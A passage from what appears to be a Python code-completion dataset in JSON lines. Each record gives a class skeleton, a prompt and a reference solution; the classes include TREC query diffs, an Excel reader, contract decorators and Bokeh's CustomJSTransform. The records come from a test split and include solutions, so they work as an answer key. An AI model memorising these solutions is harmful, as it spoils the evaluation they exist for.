:param run1_file: name of run1 file (baseline) :param run2_file: name of run2 file (new method) :param qrels: name of qrels file :param metric: metric :return:\n- def dump_differences(self, output_file): Outputs query-level differences between two methods into a tab-separated file. The first method is considered the baseline, the differences are with respect to that. Output format: queryID res1 res2 diff(res2-res1)", "prompted_full_text": "Implement the Python class `QueryDiff` described below.\n\nClass description:\nImplement the QueryDiff class.\n\nMethod signatures and docstrings:\n- def __init__(self, run1_file, run2_file, qrels, metric): :param run1_file: name of run1 file (baseline) :param run2_file: name of run2 file (new method) :param qrels: name of qrels file :param metric: metric :return:\n- def dump_differences(self, output_file): Outputs query-level differences between two methods into a tab-separated file. The first method is considered the baseline, the differences are with respect to that. Output format: queryID res1 res2 diff(res2-res1)\n\n<|skeleton|>\nclass QueryDiff:\n\n def __init__(self, run1_file, run2_file, qrels, metric):\n \"\"\":param run1_file: name of run1 file (baseline) :param run2_file: name of run2 file (new method) :param qrels: name of qrels file :param metric: metric :return:\"\"\"\n <|body_0|>\n\n def dump_differences(self, output_file):\n \"\"\"Outputs query-level differences between two methods into a tab-separated file. The first method is considered the baseline, the differences are with respect to that. 
Output format: queryID res1 res2 diff(res2-res1)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__run1_file = run1_file\n self.__run2_file = run2_file\n self.__qrels = qrels\n self.__metric = metric\n<|end_body_0|>\n\n<|body_start_1|>\n te_method1 = TrecEval()\n te_method1.evaluate(self.__qrels, self.__run1_file)\n te_method2 = TrecEval()\n te_method2.evaluate(self.__qrels, self.__run2_file)\n data = []\n for query_id in te_method1.get_query_ids():\n res1 = te_method1.get_score(query_id, self.__metric)\n res2 = te_method2.get_score(query_id, self.__metric)\n data.append([query_id, res1, res2, round(res2 - res1, 4)])\n sorted_data = sorted(data, key=lambda l: l[3], reverse=True)\n FileUtils.dump_tsv(output_file, sorted_data, header=['queryID', 'method1', 'method2', 'diff'])\n<|end_body_1|>\n", "revision_id": "7027699009504c72be4a087cf9730cad3051979b", "skeleton": "<|skeleton|>\nclass QueryDiff:\n\n def __init__(self, run1_file, run2_file, qrels, metric):\n \"\"\":param run1_file: name of run1 file (baseline) :param run2_file: name of run2 file (new method) :param qrels: name of qrels file :param metric: metric :return:\"\"\"\n <|body_0|>\n\n def dump_differences(self, output_file):\n \"\"\"Outputs query-level differences between two methods into a tab-separated file. The first method is considered the baseline, the differences are with respect to that. Output format: queryID res1 res2 diff(res2-res1)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class QueryDiff:\n def __init__(self, run1_file, run2_file, qrels, metric):\n \"\"\":param run1_file: name of run1 file (baseline) :param run2_file: name of run2 file (new method) :param qrels: name of qrels file :param metric: metric :return:\"\"\"\n self.__run1_file = run1_file\n self.__run2_file = run2_file\n self.__qrels = qrels\n self.__metric = metric\n\n def dump_differences(self, output_file):\n \"\"\"Outputs query-level differences between two methods into a tab-separated file. The first method is considered the baseline, the differences are with respect to that. 
Output format: queryID res1 res2 diff(res2-res1)\"\"\"\n te_method1 = TrecEval()\n te_method1.evaluate(self.__qrels, self.__run1_file)\n te_method2 = TrecEval()\n te_method2.evaluate(self.__qrels, self.__run2_file)\n data = []\n for query_id in te_method1.get_query_ids():\n res1 = te_method1.get_score(query_id, self.__metric)\n res2 = te_method2.get_score(query_id, self.__metric)\n data.append([query_id, res1, res2, round(res2 - res1, 4)])\n sorted_data = sorted(data, key=lambda l: l[3], reverse=True)\n FileUtils.dump_tsv(output_file, sorted_data, header=['queryID', 'method1', 'method2', 'diff'])\n", "source": "the_stack_v2_python_sparse", "source_path": "nordlys/core/eval/query_diff.py", "source_repo": "iai-group/nordlys", "split": "test", "star_events_count": 35} {"blob_id": "ba771789fee5f3c7d7b96e969701b7d7ba62430f", "bodies": ["if excel_path == None:\n current_path = os.path.abspath(os.path.dirname(__file__))\n self.excel_path = current_path + '/../data/casedata.xlsx'\nelse:\n self.excel_path = excel_path\nif sheet_name == None:\n self.sheet_name = 'Sheet'\nelse:\n self.sheet_name = sheet_name\nself.data = load_workbook(self.excel_path)\nself.sheet = self.data[self.sheet_name]", "rows = self.sheet.rows\nrow_num = self.sheet.max_row\ncol_num = self.sheet.max_column\nif row_num <= 1:\n print('总行数小于1,没有数据')\nelse:\n case_all = []\n for row in rows:\n case = []\n for i in range(col_num):\n case.append(row[i].value)\n case_all.append(case)\n return case_all"], "bodies_text": "<|body_start_0|>\n if excel_path == None:\n current_path = os.path.abspath(os.path.dirname(__file__))\n self.excel_path = current_path + '/../data/casedata.xlsx'\n else:\n self.excel_path = excel_path\n if sheet_name == None:\n self.sheet_name = 'Sheet'\n else:\n self.sheet_name = sheet_name\n self.data = load_workbook(self.excel_path)\n self.sheet = self.data[self.sheet_name]\n<|end_body_0|>\n\n<|body_start_1|>\n rows = self.sheet.rows\n row_num = self.sheet.max_row\n col_num = self.sheet.max_column\n if row_num <= 1:\n print('总行数小于1,没有数据')\n else:\n case_all = []\n for row in rows:\n case = []\n for i in range(col_num):\n case.append(row[i].value)\n case_all.append(case)\n return case_all\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ExcelUtil", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ExcelUtil:\n\n def __init__(self, excel_path=None, sheet_name=None):\n \"\"\"获取excel工作表\"\"\"\n <|body_0|>\n\n def get_data(self) -> object:\n \"\"\"获取文件数据 每一行数据一个list,所有的数据一个大list :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if excel_path == None:\n current_path = os.path.abspath(os.path.dirname(__file__))\n self.excel_path = current_path + '/../data/casedata.xlsx'\n else:\n self.excel_path = excel_path\n if sheet_name == None:\n self.sheet_name = 'Sheet'\n else:\n self.sheet_name = sheet_name\n self.data = load_workbook(self.excel_path)\n self.sheet = self.data[self.sheet_name]\n<|end_body_0|>\n\n<|body_start_1|>\n rows = self.sheet.rows\n row_num = self.sheet.max_row\n col_num = self.sheet.max_column\n if row_num <= 1:\n print('总行数小于1,没有数据')\n else:\n case_all = []\n for row in rows:\n case = []\n for i in range(col_num):\n case.append(row[i].value)\n case_all.append(case)\n return case_all\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000248", "length_bytes": 1323, "license_type": "no_license", "methods": [{"docstring": "获取excel工作表", "name": "__init__", "signature": "def __init__(self, excel_path=None, 
sheet_name=None)"}, {"docstring": "获取文件数据 每一行数据一个list,所有的数据一个大list :return:", "name": "get_data", "signature": "def get_data(self) -> object"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000025", "prompt": "Implement the Python class `ExcelUtil` described below.\n\nClass description:\nImplement the ExcelUtil class.\n\nMethod signatures and docstrings:\n- def __init__(self, excel_path=None, sheet_name=None): 获取excel工作表\n- def get_data(self) -> object: 获取文件数据 每一行数据一个list,所有的数据一个大list :return:", "prompted_full_text": "Implement the Python class `ExcelUtil` described below.\n\nClass description:\nImplement the ExcelUtil class.\n\nMethod signatures and docstrings:\n- def __init__(self, excel_path=None, sheet_name=None): 获取excel工作表\n- def get_data(self) -> object: 获取文件数据 每一行数据一个list,所有的数据一个大list :return:\n\n<|skeleton|>\nclass ExcelUtil:\n\n def __init__(self, excel_path=None, sheet_name=None):\n \"\"\"获取excel工作表\"\"\"\n <|body_0|>\n\n def get_data(self) -> object:\n \"\"\"获取文件数据 每一行数据一个list,所有的数据一个大list :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if excel_path == None:\n current_path = os.path.abspath(os.path.dirname(__file__))\n self.excel_path = current_path + '/../data/casedata.xlsx'\n else:\n self.excel_path = excel_path\n if sheet_name == None:\n self.sheet_name = 'Sheet'\n else:\n self.sheet_name = sheet_name\n self.data = load_workbook(self.excel_path)\n self.sheet = self.data[self.sheet_name]\n<|end_body_0|>\n\n<|body_start_1|>\n rows = self.sheet.rows\n row_num = self.sheet.max_row\n col_num = self.sheet.max_column\n if row_num <= 1:\n print('总行数小于1,没有数据')\n else:\n case_all = []\n for row in rows:\n case = []\n for i in range(col_num):\n case.append(row[i].value)\n case_all.append(case)\n return case_all\n<|end_body_1|>\n", "revision_id": "5f843531d413202f4f4e48ed0c3d510db21f4396", "skeleton": "<|skeleton|>\nclass ExcelUtil:\n\n def __init__(self, excel_path=None, sheet_name=None):\n \"\"\"获取excel工作表\"\"\"\n <|body_0|>\n\n def get_data(self) -> object:\n \"\"\"获取文件数据 每一行数据一个list,所有的数据一个大list :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ExcelUtil:\n def __init__(self, excel_path=None, sheet_name=None):\n \"\"\"获取excel工作表\"\"\"\n if excel_path == None:\n current_path = os.path.abspath(os.path.dirname(__file__))\n self.excel_path = current_path + '/../data/casedata.xlsx'\n else:\n self.excel_path = excel_path\n if sheet_name == None:\n self.sheet_name = 'Sheet'\n else:\n self.sheet_name = sheet_name\n self.data = load_workbook(self.excel_path)\n self.sheet = self.data[self.sheet_name]\n\n def get_data(self) -> object:\n \"\"\"获取文件数据 每一行数据一个list,所有的数据一个大list :return:\"\"\"\n rows = self.sheet.rows\n row_num = self.sheet.max_row\n col_num = self.sheet.max_column\n if row_num <= 1:\n print('总行数小于1,没有数据')\n else:\n case_all = []\n for row in rows:\n case = []\n for i in range(col_num):\n case.append(row[i].value)\n case_all.append(case)\n return case_all\n", "source": "the_stack_v2_python_sparse", "source_path": "pycharm/digiin/common/ExcelUtil.py", "source_repo": "yz9527-1/1YZ", "split": "test", "star_events_count": 0} {"blob_id": "f49958df4e894b6174bc048589695948bde0c3d5", "bodies": ["result = self.function(*args, **kwargs)\nself.validate(result)\nreturn result", "result = await self.function(*args, **kwargs)\nself.validate(result)\nreturn result", "for result in self.function(*args, **kwargs):\n 
self.validate(result)\n yield result"], "bodies_text": "<|body_start_0|>\n result = self.function(*args, **kwargs)\n self.validate(result)\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n result = await self.function(*args, **kwargs)\n self.validate(result)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n for result in self.function(*args, **kwargs):\n self.validate(result)\n yield result\n<|end_body_2|>\n", "class_docstring": "Check contract (validator) after function processing. Validate output result.", "class_name": "Post", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Post:\n \"\"\"Check contract (validator) after function processing. Validate output result.\"\"\"\n\n def patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_0|>\n\n async def async_patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_1|>\n\n def patched_generator(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n result = self.function(*args, **kwargs)\n self.validate(result)\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n result = await self.function(*args, **kwargs)\n self.validate(result)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n for result in self.function(*args, **kwargs):\n self.validate(result)\n yield result\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000249", "length_bytes": 1082, "license_type": "permissive", "methods": [{"docstring": "Step 3. Wrapped function calling.", "name": "patched_function", "signature": "def patched_function(self, *args, **kwargs)"}, {"docstring": "Step 3. Wrapped function calling.", "name": "async_patched_function", "signature": "async def async_patched_function(self, *args, **kwargs)"}, {"docstring": "Step 3. Wrapped function calling.", "name": "patched_generator", "signature": "def patched_generator(self, *args, **kwargs)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007032", "prompt": "Implement the Python class `Post` described below.\n\nClass description:\nCheck contract (validator) after function processing. Validate output result.\n\nMethod signatures and docstrings:\n- def patched_function(self, *args, **kwargs): Step 3. Wrapped function calling.\n- async def async_patched_function(self, *args, **kwargs): Step 3. Wrapped function calling.\n- def patched_generator(self, *args, **kwargs): Step 3. Wrapped function calling.", "prompted_full_text": "Implement the Python class `Post` described below.\n\nClass description:\nCheck contract (validator) after function processing. Validate output result.\n\nMethod signatures and docstrings:\n- def patched_function(self, *args, **kwargs): Step 3. Wrapped function calling.\n- async def async_patched_function(self, *args, **kwargs): Step 3. Wrapped function calling.\n- def patched_generator(self, *args, **kwargs): Step 3. Wrapped function calling.\n\n<|skeleton|>\nclass Post:\n \"\"\"Check contract (validator) after function processing. Validate output result.\"\"\"\n\n def patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_0|>\n\n async def async_patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_1|>\n\n def patched_generator(self, *args, **kwargs):\n \"\"\"Step 3. 
Wrapped function calling.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n result = self.function(*args, **kwargs)\n self.validate(result)\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n result = await self.function(*args, **kwargs)\n self.validate(result)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n for result in self.function(*args, **kwargs):\n self.validate(result)\n yield result\n<|end_body_2|>\n", "revision_id": "9dff86e1dc5c8607f02ded34b6d64e770f1959fa", "skeleton": "<|skeleton|>\nclass Post:\n \"\"\"Check contract (validator) after function processing. Validate output result.\"\"\"\n\n def patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_0|>\n\n async def async_patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_1|>\n\n def patched_generator(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Post:\n \"\"\"Check contract (validator) after function processing. Validate output result.\"\"\"\n\n def patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n result = self.function(*args, **kwargs)\n self.validate(result)\n return result\n\n async def async_patched_function(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n result = await self.function(*args, **kwargs)\n self.validate(result)\n return result\n\n def patched_generator(self, *args, **kwargs):\n \"\"\"Step 3. Wrapped function calling.\"\"\"\n for result in self.function(*args, **kwargs):\n self.validate(result)\n yield result\n", "source": "the_stack_v2_python_sparse", "source_path": "deal/_decorators/post.py", "source_repo": "toonarmycaptain/deal", "split": "test", "star_events_count": 0} {"blob_id": "6e131255a5e2cf2d58e865f0a736daa9d308d1e1", "bodies": ["from bokeh.util.deprecation import deprecated\ndeprecated(\"'from_py_func' is deprecated and will be removed in an eventual 2.0 release. 
Use CustomJSTransform directly instead.\")\nif not isinstance(func, FunctionType) or not isinstance(v_func, FunctionType):\n raise ValueError('CustomJSTransform.from_py_func only accepts function objects.')\npscript = import_required('pscript', dedent(' To use Python functions for CustomJSTransform, you need PScript\\n \\'(\"conda install -c conda-forge pscript\" or \"pip install pscript\")'))\n\ndef pscript_compile(func):\n sig = signature(func)\n all_names, default_values = get_param_info(sig)\n if len(all_names) - len(default_values) != 0:\n raise ValueError('Function may only contain keyword arguments.')\n if default_values and (not any((isinstance(value, Model) for value in default_values))):\n raise ValueError('Default value must be a Bokeh Model.')\n func_kwargs = dict(zip(all_names, default_values))\n code = pscript.py2js(func, 'transformer') + 'return transformer(%s);\\n' % ', '.join(all_names)\n return (code, func_kwargs)\njsfunc, func_kwargs = pscript_compile(func)\nv_jsfunc, v_func_kwargs = pscript_compile(v_func)\nfunc_kwargs.update(v_func_kwargs)\nreturn cls(func=jsfunc, v_func=v_jsfunc, args=func_kwargs)", "compiled = nodejs_compile(func, lang='coffeescript', file='???')\nif 'error' in compiled:\n raise CompilationError(compiled.error)\nv_compiled = nodejs_compile(v_func, lang='coffeescript', file='???')\nif 'error' in v_compiled:\n raise CompilationError(v_compiled.error)\nreturn cls(func=compiled.code, v_func=v_compiled.code, args=args)"], "bodies_text": "<|body_start_0|>\n from bokeh.util.deprecation import deprecated\n deprecated(\"'from_py_func' is deprecated and will be removed in an eventual 2.0 release. Use CustomJSTransform directly instead.\")\n if not isinstance(func, FunctionType) or not isinstance(v_func, FunctionType):\n raise ValueError('CustomJSTransform.from_py_func only accepts function objects.')\n pscript = import_required('pscript', dedent(' To use Python functions for CustomJSTransform, you need PScript\\n \\'(\"conda install -c conda-forge pscript\" or \"pip install pscript\")'))\n\n def pscript_compile(func):\n sig = signature(func)\n all_names, default_values = get_param_info(sig)\n if len(all_names) - len(default_values) != 0:\n raise ValueError('Function may only contain keyword arguments.')\n if default_values and (not any((isinstance(value, Model) for value in default_values))):\n raise ValueError('Default value must be a Bokeh Model.')\n func_kwargs = dict(zip(all_names, default_values))\n code = pscript.py2js(func, 'transformer') + 'return transformer(%s);\\n' % ', '.join(all_names)\n return (code, func_kwargs)\n jsfunc, func_kwargs = pscript_compile(func)\n v_jsfunc, v_func_kwargs = pscript_compile(v_func)\n func_kwargs.update(v_func_kwargs)\n return cls(func=jsfunc, v_func=v_jsfunc, args=func_kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n compiled = nodejs_compile(func, lang='coffeescript', file='???')\n if 'error' in compiled:\n raise CompilationError(compiled.error)\n v_compiled = nodejs_compile(v_func, lang='coffeescript', file='???')\n if 'error' in v_compiled:\n raise CompilationError(v_compiled.error)\n return cls(func=compiled.code, v_func=v_compiled.code, args=args)\n<|end_body_1|>\n", "class_docstring": "Apply a custom defined transform to data. .. warning:: The explicit purpose of this Bokeh Model is to embed *raw JavaScript code* for a browser to execute. 
If any part of the code is derived from untrusted user inputs, then you must take appropriate care to sanitize the user input prior to passing to Bokeh.", "class_name": "CustomJSTransform", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CustomJSTransform:\n \"\"\"Apply a custom defined transform to data. .. warning:: The explicit purpose of this Bokeh Model is to embed *raw JavaScript code* for a browser to execute. If any part of the code is derived from untrusted user inputs, then you must take appropriate care to sanitize the user input prior to passing to Bokeh.\"\"\"\n\n def from_py_func(cls, func, v_func):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of Python functions. The function is translated to JavaScript using PScript. The python functions must have no positional arguments. It's possible to pass Bokeh models (e.g. a ``ColumnDataSource``) as keyword arguments to the functions. The ``func`` function namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` function namespace will contain the variable ``xs`` (the untransformed vector) at render time. .. warning:: The vectorized function, ``v_func``, must return an array of the same length as the input ``xs`` array. Example: .. code-block:: python def transform(): from pscript.stubs import Mat\"\"\"\n <|body_0|>\n\n def from_coffeescript(cls, func, v_func, args={}):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of CoffeeScript snippets. The function bodies are translated to JavaScript functions using node and therefore require return statements. The ``func`` snippet namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` snippet namespace will contain the variable ``xs`` (the untransformed vector) at render time. Example: .. code-block:: coffeescript func = \"return Math.cos(x)\" v_func = \"return [Math.cos(x) for x in xs]\" transform = CustomJSTransform.from_coffeescript(func, v_func) Args: func (str) : a coffeescript snippet to transform a single ``x`` value v_func (str) : a coffeescript snippet function to\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from bokeh.util.deprecation import deprecated\n deprecated(\"'from_py_func' is deprecated and will be removed in an eventual 2.0 release. 
Use CustomJSTransform directly instead.\")\n if not isinstance(func, FunctionType) or not isinstance(v_func, FunctionType):\n raise ValueError('CustomJSTransform.from_py_func only accepts function objects.')\n pscript = import_required('pscript', dedent(' To use Python functions for CustomJSTransform, you need PScript\\n \\'(\"conda install -c conda-forge pscript\" or \"pip install pscript\")'))\n\n def pscript_compile(func):\n sig = signature(func)\n all_names, default_values = get_param_info(sig)\n if len(all_names) - len(default_values) != 0:\n raise ValueError('Function may only contain keyword arguments.')\n if default_values and (not any((isinstance(value, Model) for value in default_values))):\n raise ValueError('Default value must be a Bokeh Model.')\n func_kwargs = dict(zip(all_names, default_values))\n code = pscript.py2js(func, 'transformer') + 'return transformer(%s);\\n' % ', '.join(all_names)\n return (code, func_kwargs)\n jsfunc, func_kwargs = pscript_compile(func)\n v_jsfunc, v_func_kwargs = pscript_compile(v_func)\n func_kwargs.update(v_func_kwargs)\n return cls(func=jsfunc, v_func=v_jsfunc, args=func_kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n compiled = nodejs_compile(func, lang='coffeescript', file='???')\n if 'error' in compiled:\n raise CompilationError(compiled.error)\n v_compiled = nodejs_compile(v_func, lang='coffeescript', file='???')\n if 'error' in v_compiled:\n raise CompilationError(v_compiled.error)\n return cls(func=compiled.code, v_func=v_compiled.code, args=args)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000250", "length_bytes": 13400, "license_type": "permissive", "methods": [{"docstring": "Create a ``CustomJSTransform`` instance from a pair of Python functions. The function is translated to JavaScript using PScript. The python functions must have no positional arguments. It's possible to pass Bokeh models (e.g. a ``ColumnDataSource``) as keyword arguments to the functions. The ``func`` function namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` function namespace will contain the variable ``xs`` (the untransformed vector) at render time. .. warning:: The vectorized function, ``v_func``, must return an array of the same length as the input ``xs`` array. Example: .. code-block:: python def transform(): from pscript.stubs import Mat", "name": "from_py_func", "signature": "def from_py_func(cls, func, v_func)"}, {"docstring": "Create a ``CustomJSTransform`` instance from a pair of CoffeeScript snippets. The function bodies are translated to JavaScript functions using node and therefore require return statements. The ``func`` snippet namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` snippet namespace will contain the variable ``xs`` (the untransformed vector) at render time. Example: .. code-block:: coffeescript func = \"return Math.cos(x)\" v_func = \"return [Math.cos(x) for x in xs]\" transform = CustomJSTransform.from_coffeescript(func, v_func) Args: func (str) : a coffeescript snippet to transform a single ``x`` value v_func (str) : a coffeescript snippet function to", "name": "from_coffeescript", "signature": "def from_coffeescript(cls, func, v_func, args={})"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004772", "prompt": "Implement the Python class `CustomJSTransform` described below.\n\nClass description:\nApply a custom defined transform to data. .. 
warning:: The explicit purpose of this Bokeh Model is to embed *raw JavaScript code* for a browser to execute. If any part of the code is derived from untrusted user inputs, then you must take appropriate care to sanitize the user input prior to passing to Bokeh.\n\nMethod signatures and docstrings:\n- def from_py_func(cls, func, v_func): Create a ``CustomJSTransform`` instance from a pair of Python functions. The function is translated to JavaScript using PScript. The python functions must have no positional arguments. It's possible to pass Bokeh models (e.g. a ``ColumnDataSource``) as keyword arguments to the functions. The ``func`` function namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` function namespace will contain the variable ``xs`` (the untransformed vector) at render time. .. warning:: The vectorized function, ``v_func``, must return an array of the same length as the input ``xs`` array. Example: .. code-block:: python def transform(): from pscript.stubs import Mat\n- def from_coffeescript(cls, func, v_func, args={}): Create a ``CustomJSTransform`` instance from a pair of CoffeeScript snippets. The function bodies are translated to JavaScript functions using node and therefore require return statements. The ``func`` snippet namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` snippet namespace will contain the variable ``xs`` (the untransformed vector) at render time. Example: .. code-block:: coffeescript func = \"return Math.cos(x)\" v_func = \"return [Math.cos(x) for x in xs]\" transform = CustomJSTransform.from_coffeescript(func, v_func) Args: func (str) : a coffeescript snippet to transform a single ``x`` value v_func (str) : a coffeescript snippet function to", "prompted_full_text": "Implement the Python class `CustomJSTransform` described below.\n\nClass description:\nApply a custom defined transform to data. .. warning:: The explicit purpose of this Bokeh Model is to embed *raw JavaScript code* for a browser to execute. If any part of the code is derived from untrusted user inputs, then you must take appropriate care to sanitize the user input prior to passing to Bokeh.\n\nMethod signatures and docstrings:\n- def from_py_func(cls, func, v_func): Create a ``CustomJSTransform`` instance from a pair of Python functions. The function is translated to JavaScript using PScript. The python functions must have no positional arguments. It's possible to pass Bokeh models (e.g. a ``ColumnDataSource``) as keyword arguments to the functions. The ``func`` function namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` function namespace will contain the variable ``xs`` (the untransformed vector) at render time. .. warning:: The vectorized function, ``v_func``, must return an array of the same length as the input ``xs`` array. Example: .. code-block:: python def transform(): from pscript.stubs import Mat\n- def from_coffeescript(cls, func, v_func, args={}): Create a ``CustomJSTransform`` instance from a pair of CoffeeScript snippets. The function bodies are translated to JavaScript functions using node and therefore require return statements. The ``func`` snippet namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` snippet namespace will contain the variable ``xs`` (the untransformed vector) at render time. Example: .. 
code-block:: coffeescript func = \"return Math.cos(x)\" v_func = \"return [Math.cos(x) for x in xs]\" transform = CustomJSTransform.from_coffeescript(func, v_func) Args: func (str) : a coffeescript snippet to transform a single ``x`` value v_func (str) : a coffeescript snippet function to\n\n<|skeleton|>\nclass CustomJSTransform:\n \"\"\"Apply a custom defined transform to data. .. warning:: The explicit purpose of this Bokeh Model is to embed *raw JavaScript code* for a browser to execute. If any part of the code is derived from untrusted user inputs, then you must take appropriate care to sanitize the user input prior to passing to Bokeh.\"\"\"\n\n def from_py_func(cls, func, v_func):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of Python functions. The function is translated to JavaScript using PScript. The python functions must have no positional arguments. It's possible to pass Bokeh models (e.g. a ``ColumnDataSource``) as keyword arguments to the functions. The ``func`` function namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` function namespace will contain the variable ``xs`` (the untransformed vector) at render time. .. warning:: The vectorized function, ``v_func``, must return an array of the same length as the input ``xs`` array. Example: .. code-block:: python def transform(): from pscript.stubs import Mat\"\"\"\n <|body_0|>\n\n def from_coffeescript(cls, func, v_func, args={}):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of CoffeeScript snippets. The function bodies are translated to JavaScript functions using node and therefore require return statements. The ``func`` snippet namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` snippet namespace will contain the variable ``xs`` (the untransformed vector) at render time. Example: .. code-block:: coffeescript func = \"return Math.cos(x)\" v_func = \"return [Math.cos(x) for x in xs]\" transform = CustomJSTransform.from_coffeescript(func, v_func) Args: func (str) : a coffeescript snippet to transform a single ``x`` value v_func (str) : a coffeescript snippet function to\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from bokeh.util.deprecation import deprecated\n deprecated(\"'from_py_func' is deprecated and will be removed in an eventual 2.0 release. 
Use CustomJSTransform directly instead.\")\n if not isinstance(func, FunctionType) or not isinstance(v_func, FunctionType):\n raise ValueError('CustomJSTransform.from_py_func only accepts function objects.')\n pscript = import_required('pscript', dedent(' To use Python functions for CustomJSTransform, you need PScript\\n \\'(\"conda install -c conda-forge pscript\" or \"pip install pscript\")'))\n\n def pscript_compile(func):\n sig = signature(func)\n all_names, default_values = get_param_info(sig)\n if len(all_names) - len(default_values) != 0:\n raise ValueError('Function may only contain keyword arguments.')\n if default_values and (not any((isinstance(value, Model) for value in default_values))):\n raise ValueError('Default value must be a Bokeh Model.')\n func_kwargs = dict(zip(all_names, default_values))\n code = pscript.py2js(func, 'transformer') + 'return transformer(%s);\\n' % ', '.join(all_names)\n return (code, func_kwargs)\n jsfunc, func_kwargs = pscript_compile(func)\n v_jsfunc, v_func_kwargs = pscript_compile(v_func)\n func_kwargs.update(v_func_kwargs)\n return cls(func=jsfunc, v_func=v_jsfunc, args=func_kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n compiled = nodejs_compile(func, lang='coffeescript', file='???')\n if 'error' in compiled:\n raise CompilationError(compiled.error)\n v_compiled = nodejs_compile(v_func, lang='coffeescript', file='???')\n if 'error' in v_compiled:\n raise CompilationError(v_compiled.error)\n return cls(func=compiled.code, v_func=v_compiled.code, args=args)\n<|end_body_1|>\n", "revision_id": "1ad7ec05fb1e3676ac879585296c513c3ee50ef9", "skeleton": "<|skeleton|>\nclass CustomJSTransform:\n \"\"\"Apply a custom defined transform to data. .. warning:: The explicit purpose of this Bokeh Model is to embed *raw JavaScript code* for a browser to execute. If any part of the code is derived from untrusted user inputs, then you must take appropriate care to sanitize the user input prior to passing to Bokeh.\"\"\"\n\n def from_py_func(cls, func, v_func):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of Python functions. The function is translated to JavaScript using PScript. The python functions must have no positional arguments. It's possible to pass Bokeh models (e.g. a ``ColumnDataSource``) as keyword arguments to the functions. The ``func`` function namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` function namespace will contain the variable ``xs`` (the untransformed vector) at render time. .. warning:: The vectorized function, ``v_func``, must return an array of the same length as the input ``xs`` array. Example: .. code-block:: python def transform(): from pscript.stubs import Mat\"\"\"\n <|body_0|>\n\n def from_coffeescript(cls, func, v_func, args={}):\n \"\"\"Create a ``CustomJSTransform`` instance from a pair of CoffeeScript snippets. The function bodies are translated to JavaScript functions using node and therefore require return statements. The ``func`` snippet namespace will contain the variable ``x`` (the untransformed value) at render time. The ``v_func`` snippet namespace will contain the variable ``xs`` (the untransformed vector) at render time. Example: .. 
